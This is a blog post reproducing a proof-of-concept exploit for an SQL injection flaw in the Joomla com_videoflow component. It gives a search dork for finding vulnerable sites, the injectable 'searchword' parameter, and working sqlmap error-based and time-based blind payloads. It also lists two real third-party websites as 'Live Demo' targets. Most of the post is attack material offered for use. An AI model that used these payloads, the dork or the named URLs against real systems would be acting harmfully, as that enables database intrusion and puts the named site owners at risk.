latest Post

/ / / PoC: Joomla com_videoflow SQL injection Vulnerability

PoC: Joomla com_videoflow SQL injection Vulnerability

By , Edit
######################
# Exploit Title : Joomla com_videoflow SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_videoflow
# Vendor Homepage : http://www.fidsoft.com
# version : 1.1.3 - 1.1.5
# Tested on: [ BACK BOX]
# skype:xbadgirl21
# Date: 04/08/2016
# video Proof : https://www.youtube.com/watch?v=o16dZdO-Q9U
######################
# [+] DESCRIPTION :
######################
# [+] VideoFlow is a multimedia system for Joomla! and Facebook that makes sharing multimedia content across
# [+] the two platforms a breeze. Visit www.videoflow.tv for more information, support and demos.
# [+] AND an SQL injection been Detected in this Joomla components videoflow after you add ['] to
# [+] Vuln Target Parameter you will get error like :
# [!] You have an error in your SQL syntax; check the manual that corresponds to your MySQL
# [!] server version for the right syntax to use near ''' at line 1 SQL=SELECT
######################
# [+] Poc :
######################
# [searchword] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/index.php?option=com_videoflow&task=search&vs=1&searchword=1'
######################
# [+] SQLmap PoC:
######################
# ---
#Parameter: searchword (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT 9107 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT #(ELT(9107=9107,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('fDLe'='fDLe
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
# Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT * FROM (SELECT(SLEEP(5)))ImsR) AND ('yKcO'='yKcO
#
######################
# [!] Live Demo :
######################
# http://egyptshortcuts.com/amrmabrouk/index.php?option=com_videoflow&task=search&vs=1&searchword=1
# http://www.misitimi.gr/index.php?option=com_videoflow&task=search&vs=1&searchword=1
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

About xBADGIRL21

xBADGIRL21
Recommended Posts × +

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )